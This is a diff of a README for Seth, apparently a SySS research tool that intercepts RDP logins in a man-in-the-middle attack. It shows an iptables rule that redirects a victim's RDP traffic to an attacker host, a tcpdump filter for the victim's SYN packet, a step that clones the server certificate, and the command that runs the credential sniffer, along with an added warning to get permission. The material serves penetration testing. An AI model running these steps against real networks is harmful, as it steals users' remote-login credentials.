SySS-Research/Seth/README.md

     iptables -t nat -A PREROUTING -p tcp -s $VICTIM_IP --dport 3389 \
         -j DNAT --to-destination $ATTACKER_IP:3389

-Second, we wait for TCP packet with destination port 3389 from the victim.
+Second, we wait for a TCP SYN packet with destination port 3389 from the victim.
 We use `tcpdump` for this:

     tcpdump -n -c 1 -i "$IFACE" src host "$VICTIM_IP" and \
+        "tcp[tcpflags] & tcp-syn != 0" and \
         dst port 3389 2> /dev/null  | \
         sed -e  's/.*> \([0-9.]*\)\.3389:.*/\1/'

 The `-c 1` options tells `tcpdump` to exit after the first matching packet.
+This SYN packet will be lost, since our service isn't running yet.
+But that doesn't really matter, it will only be a short while before the victim's system will try again.
+We don't want to capture any other packets, since they would most likely belong to an already active RDP connection.
+Note that this will disrupt active RDP connections of the victim, so you need to warn them in advance.
+Don't do it without permission!

 Third, we'll retrieve the SSL certificate of the RDP server and create a new self-signed certificate that has the same common name as the original certificate.
-We could also fix the certificate's expiration date, and it will be literally indistinguishable unless you take a good, hard look at its fingerprint.
-I wrote a [small `bash` script](...) to do the job for us.
+We could also fix the certificate's expiration date, and it will be literally indistinguishable from the original unless you take a long, hard look at its fingerprint.
+I wrote a [small Bash script](...) to do the job for us.

-Now we have all the information we need to run our python script:
+At this point we have all the information we need to run our Python script:

     rdp-cred-sniffer.py -c "$CERTPATH" -k "$KEYPATH" "$ORIGINAL_DEST"